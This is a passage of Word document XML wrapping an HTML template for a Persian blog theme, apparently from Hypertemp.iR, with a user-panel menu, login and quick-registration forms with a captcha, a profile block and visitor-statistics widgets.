      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ارسال پست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&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6710FD76" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>پنل کاربر</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>پنل کاربر</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" href="/Panel"&gt;&lt;i class="fa fa-id-card-o"&gt;&lt;/i&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>پنل کاربر</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D88A96" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>مشاهده پروفا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t>" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>مشاهده پروفا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t xml:space="preserve">" href="[Login_Profile]"&gt;&lt;i class="fa fa-id-card"&gt;&lt;/i&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>مشاهده پروفا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t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B49537D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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پروفا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t>" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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پروفا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t xml:space="preserve">" href="/Edit_Profile"&gt;&lt;i class="fa fa-edit"&gt;&lt;/i&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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پروفا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t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0714C8B1" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ارسال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t>" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ارسال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t xml:space="preserve">" href="/Send/Message"&gt;&lt;i class="fa fa-envelope-o"&gt;&lt;/i&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ارسال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t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4363DF74" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>پيام خصوصي</w:t>
      </w:r>
      <w:r>
        <w:t>" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>پيام خصوصي</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" href="/Display/Message"&gt;&lt;i class="fa fa-inbox"&gt;&lt;/i&gt; &lt;b&gt;[Login_Count_Message]&lt;/b&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698044F9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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ارسال شده</w:t>
      </w:r>
      <w:r>
        <w:t>" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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ارسال شده</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" href="/Display/Mess/Send"&gt;&lt;i class="fa fa-envelope-open-o"&gt;&lt;/i&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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ارسال شده</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E2EA82" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344B6634" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C9ECC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5284E401" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;style type="text/css"&gt;header .login-register .side,header .login-register .form{display:none}&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2BE9C8" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:If_Login_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B47B51" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="40EBAE37" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="side" id="side-one"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C873B04" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h3&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>حساب کاربر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د؟</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEFC36C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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استفاده از مطالب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مشاهده تاپ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انجمن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به حساب کاربر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داشت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الان بساز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!&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B28DE33" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;samp id="close-side-one"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>عضو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در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t>&lt;/samp&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E12DCF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA72B87" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="2E3D9EE7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="side" id="side-two" style="display:none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D05DAFD" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h3&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>حساب کاربر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د؟</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AED1EF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>شما وارد حساب کاربر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 نشده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استفاده از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به ورود به حساب کاربر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.&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B8963E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;samp id="close-side-two"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ورود به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t>&lt;/samp&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116888E4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7258476D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="form"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB90E11" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="395D8A8D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Form_Login_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54991E09" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div id="coun1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11221ECE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h3&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ورود به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t xml:space="preserve"> &lt;i class="fa fa-sign-in"&gt;&lt;/i&gt;&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65048F03" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div id="login_ajax"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEF5F8C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;form action="/login" method="post" onsubmit="return Login_Ajax();"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C31688F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input name="sec_code_5" id="sec_code_5" value="54d07a73177a9a0509e7f0021947c93e" type="hidden"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E85029A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input name="login" id="login" value="2" type="hidden"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC1A0D0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input id="rbuser_hh" name="username" size="" style="" placeholder="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وزرن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>" dir="ltr" maxlength="40" type="text"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724347B7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;input name="password" id="password_hh" size="" style="" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>پسورد</w:t>
      </w:r>
      <w:r>
        <w:t>" dir="ltr" maxlength="60" type="password"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2336F0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a class="form-recovery" href="/forget"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>پسورد خود را فراموش کرده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د؟</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FF479D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input name="submit_login" value="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ورود به پنل کاربر</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>"type="submit"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036B353F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div id="load_login_ajax_w"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E651E2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E01416" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F4052" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320369B3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Form_Login_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FABEAF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="7972246D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Reg_Fast_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEC562C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div id="coun2" style="display:none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B2911A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h3&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>عضو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در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t xml:space="preserve"> &lt;i class="fa fa-user-plus"&gt;&lt;/i&gt;&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28757859" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div id="fast_register"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D96C95F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;form action="/Sign-up" method=post name=f_register&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB80F96" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input type=text name=username id=username_f size="" placeholder="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وزرن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>" style="" dir="ltr" maxlength=40&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3AD1AC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input type=password name=password id=password_f size="" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>پسورد</w:t>
      </w:r>
      <w:r>
        <w:t>" style="" dir="ltr" maxlength=60&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A87B5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input type=password name=repassword id=repassword_f size="" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>پسورد را مجدد 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" style="" dir="ltr" maxlength=60&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3884E486" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input type=text name=email id=email_f size="" dir="ltr" placeholder="</w:t>
      </w:r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t>" style="" maxlength=100&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3FC43E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input type=text name=name id=name_f size="" dir="ltr" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>نام مستعار</w:t>
      </w:r>
      <w:r>
        <w:t>" style="" maxlength=100&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72585703" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;img width="67" height="20" src="/include/captcha/cap7.php" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>کد امن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t>" alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>کد امن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t>" id="im_sec" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420EFBC9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="#" class="reload" onclick="document.getElementById('im_sec').src='/include/captcha/cap7.php?Reload_id=' + Math.random(); return false" rel="nofollow"&gt;&lt;i class="fa fa-refresh"&gt;&lt;/i&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DE24DC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input type="text" name="capt" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>کد کپچا</w:t>
      </w:r>
      <w:r>
        <w:t>" id=capt_f size="10"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C38F9C5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;input onclick=javascript:Fast_Register() name=submitreg type=button value="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ثبت نام در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t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D2B8FC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F5ACA" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1AB68C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADA02EC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Reg_Fast_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AEE2BD" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="583D3FAE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C0D9F1" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4175C353" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR User Panel End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD319A6" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="068BCE9F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Profile Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C827105" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Profile_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73369CB0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_About_Block&gt;&lt;p class="about"&gt;[Profile_About]&lt;/p&gt;&lt;/RB:Blog_About_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1125FDE8" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Profile_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798A6B65" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Profile End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E46F1C9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="12B67BAC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Hit Stats Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB32C2E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Counter_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB2D17A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="amar"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B1D66" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="item"&gt;&lt;i class="fa fa-signal"&gt;&lt;/i&gt;&lt;b id="rt-today-amount"&gt;&lt;/b&gt;&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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امروز</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4390FF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="item"&gt;&lt;i class="fa fa-signal"&gt;&lt;/i&gt;&lt;b&lt;li&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>افراد آنلاين</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : &lt;span class="stVal"&gt;[Online]&lt;/span&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1E504B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="item"&gt;&lt;i class="fa fa-signal"&gt;&lt;/i&gt;&lt;b&lt;li&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ورودي گوگل</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> :&lt;span class="stVal"&gt;[Google_Day]&lt;/span&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB15ED" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="item"&gt;&lt;i class="fa fa-signal"&gt;&lt;/i&gt;&lt;b&lt;li&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>بازديد امروز</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : &lt;span class="stVal"&gt;[Today]&lt;/span&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06850649" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="item"&gt;&lt;i class="fa fa-signal"&gt;&lt;/i&gt;&lt;b&lt;li&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
